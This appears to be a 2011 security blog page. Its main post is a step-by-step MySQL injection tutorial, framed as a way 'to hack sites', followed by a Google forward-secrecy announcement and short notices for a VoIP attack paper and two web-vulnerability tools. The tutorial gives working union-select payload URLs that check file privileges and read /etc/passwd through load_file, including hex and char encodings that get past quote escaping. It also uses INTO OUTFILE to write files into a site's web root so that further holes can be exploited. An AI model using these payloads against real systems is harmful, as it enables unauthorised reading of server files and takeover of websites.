menu

Thursday, 24 November 2011

MySQL Injection - Simple Load File and Into OutFile

MySQL Injection - Simple Load File and Into OutFile


Introduction

If you know (basic) MySQL Injection, you can read this tutorial...

Ok, let's see now what are Load File and Into OutFile.

-- What are Load File and Into OutFile?
That are syntaxes (used in MySQL Injections).

Load File: Reads the file and returns the file contents as a string.
Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the file privilege to use this syntax. File to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed.
(... from: MySQL.com)

Ok, let's begin now!

-

Access to "mysql.user" table and file privileges

If you are using MySQL Injection method (to hack sites), and before you find target table (and columns),
check, if you have access to "mysql.user" table.
And you must replace in URL one visible column (i.e. number, that is shown, on page), with (string) "user", to see user name.

Let's see our example:
http://vulnsite.com/index.php?id=-1+union+all+select+1,user,3,4+
from+mysql.user--
In our example, column (number) 2 can be seen on our vulnerable page.

If page returns user name, in place where is that visible column (shown) on site, that's good - you have access (to "mysql.user" table), and you can continue to read this tutorial. Don't forget to remember user name that you have seen!

In our example that happens (we have access to "mysql.user" table), and we can continue to check now if we have file privileges.
You must now replace in URL: "user", with (string) "group_concat(user,0x3a,file_priv)",
to check, if you have file privileges on (your) vulnerable site.

Here is our example:
http://vulnsite.com/index.php?id=-1+union+all+select+1,group_concat
(user,0x3a,file_priv),3,4+from+mysql.user--

Now on place, where is that (visible) column shown (i.e. replaced), it lists users and file privileges (in format: User name:File privileges, ...), and you must find user name that you have seen before, and when you find that user name, look on right side (near that user name), and if it writes "Y" (that means Yes), you have file privileges (and you can continue to read this tutorial), otherwise, if it writes "N" (that means No), you haven't file privileges.
In our example we have file privileges (of course) - "... ,ouruser:Y, ...".

Let's go now to the next part.

-

Using Load File syntax

Load File is useful when you want to read some (configuration) files (it's like LFI - Local File Inclusion), ex. "/etc/passwd", "/etc/shadow", etc.

Syntax is: load_file('FILE')

Here is our example - if we want to read "/etc/passwd" file:
http://vulnsite.com/index.php?id=-1+union+all+select+1
,load_file('/etc/passwd'),3,4+from+mysql.user--
In place where is column (number) 2, it will show (source of) "/etc/passwd" file (on page).

Note 1: "../" - means move to directory back.

Note 2: If it shows error (when you try to read some file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert file name (i.e. text/string), to Hex or Char (and then remove "'" symbols):

For Hex - Always put "0x" (text) before hex string (without any spaces), and that (final) string must not contain (any) spaces(!) ; ex. (Load File - "/etc/passwd":) load_file(0x2f6574632f706173737764)

For Char - Usage: char(NUMBERS,NUMBERS,NUMBERS...) ; If you convert string (i.e. text) to Char, and if converted text (to Char) contain spaces (between numbers), you must replace all that spaces with commas(!) ; ex. (Load File - "/etc/passwd":) load_file(char(47,101,116,99,47,112,97,115,115,119,100))
BTW. Here is one translator, i.e. text to Hex and (text to) Char converter:
http://home2.paulschou.net/tools/xlate/

That's all for Load File syntax.

-

Using Into OutFile syntax

Into OutFile is useful when you want to write/make some file (on your vulnerable site/server), ex. make (simple PHP) file, that is vulnerable on RFI (Remote File Inclusion), and then exploit that hole...

Syntax is: INTO OUTFILE 'FILE'
Note 1: That syntax must be always on end (it's like table)! Ex. ...+INTO+OUTFILE+'/FILE'--
To write (your) text in (your) file (on vulnerable site/server), replace in URL one visible column (i.e. number, that is shown, on page), with (your) text (to be written, in your file), in quotes...

Let's see our example - we want to write text "testing" in file "test.txt" (on our vulnerable site/server), in site directory:
http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing"
,3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--

Note 2:
If you have two or more visible columns (i.e. numbers, that are shown, on your vulnerable page), you have to replace that columns (i.e. numbers, in URL), with word "null"(!) (If you don't replace, that numbers will be written together with your text in your file, on vulnerable site/server.)
In our example, visible columns are - 2 and 3 (and we must do replacing):
http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing"
,null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--
 
And then, if page loads normally (without any errors), we have successfully made our file (on our vulnerable site/server), and location of our file (on our vulnerable site/server), will be:
http://vulnsite.com/test.txt

Note 3: If you want to use in (your) text (to be written, in your file) Return/Enter button, just (type your text somewhere - in converter/translator, and) convert it to Hex or Char...

Note 4: You must write (i.e. make all your files) into site path, otherwise, Into OutFile syntax won't work.

Note 5: If it shows blank (i.e. error, on page), where should be located (your) text (to be written, in your file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert text (i.e. string), to Hex or Char (and then remove "'" symbols) - see above explanation (and link to converter), in (end of) part 3...

Warning: Don't convert (your) file name into Hex or Char, otherwise, it won't work (that's only for Into OutFile syntax)! And, if (your) vulnerable site have magic quotes (feature) enabled, Into OutFile syntax will not work.

Finish...
M.O.R.E >> "MySQL Injection - Simple Load File and Into OutFile"

Wednesday, 23 November 2011

Google Online Security Blog: Protecting data for the long term with forward secrecy

Google Online Security Blog: Protecting data for the long term with forward secrecy

Last year we introduced HTTPS by default for Gmail and encrypted search. We’re pleased to see that other major communications sites are following suit and deploying HTTPS in one form or another. We are now pushing forward by enabling forward secrecy by default.

Most major sites supporting HTTPS operate in a non-forward secret fashion, which runs the risk of retrospective decryption. In other words, an encrypted, unreadable email could be recorded while being delivered to your computer today. In ten years time, when computers are much faster, an adversary could break the server private key and retrospectively decrypt today’s email traffic.

Forward secrecy requires that the private keys for a connection are not kept in persistent storage. An adversary that breaks a single key will no longer be able to decrypt months’ worth of connections; in fact, not even the server operator will be able to retroactively decrypt HTTPS sessions.

Forward secret HTTPS is now live for Gmail and many other Google HTTPS services(*), like SSL Search, Docs and Google+. We have also released the work that we did on the open source OpenSSL library that made this possible. You can check whether you have forward secret connections in Chrome by clicking on the green padlock in the address bar of HTTPS sites. Google’s forward secret connections will have a key exchange mechanism of ECDHE_RSA.

We would very much like to see forward secrecy become the norm and hope that our deployment serves as a demonstration of the practicality of that vision.


(* Chrome, Firefox (all platforms) and Internet Explorer (Vista or later) support forward secrecy using elliptic curve Diffie-Hellman. Initially, only Chrome and Firefox will use it by default with Google services because IE doesn’t support the combination of ECDHE and RC4. We hope to support IE in the future.)
M.O.R.E >> "Google Online Security Blog: Protecting data for the long term with forward secrecy"

Enumerating And Breaking VoIP

 Source :packetstormsecurity Whitepaper called Enumerating and Breaking VoIP. It discusses various enumeration techniques followed by a demonstration of a few VoIP attacks.
tags | paper
MD5 | 6f838df84fef711d5acd89d899314395
Download : enumerating_breaking_voip.pdf
M.O.R.E >> "Enumerating And Breaking VoIP"

w3af v.1.1 Released

w3af v.1.1 Released

w3af v.1.1 Released

Web Application Attack and Audit Framework

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins

changes:
* Considerably increased performance by implementing gzip encoding
* Enhanced embedded bug report system using Trac's XMLRPC
* Fixed hundreds of bugs * Fixed critical bug in auto-update feature
* Enhanced integration with other tools (bug fixed and added more info to the file)

Download: http://sourceforge.net
M.O.R.E >> "w3af v.1.1 Released"

PHP Vulnerability Hunter v.1.1.4.6

PHP Vulnerability Hunter v.1.1.4.6

PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool.

This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.

ChangeLog:
Added code coverage report
Updated GUI validation
Several instrumentation fixes
Fixed lingering connection issue
Fixed GUI and report viewer crashes related to working directory

Download: http://code.google.com

More: http://www.autosectools.com/PHP-Vulnerability-Scanner
M.O.R.E >> "PHP Vulnerability Hunter v.1.1.4.6"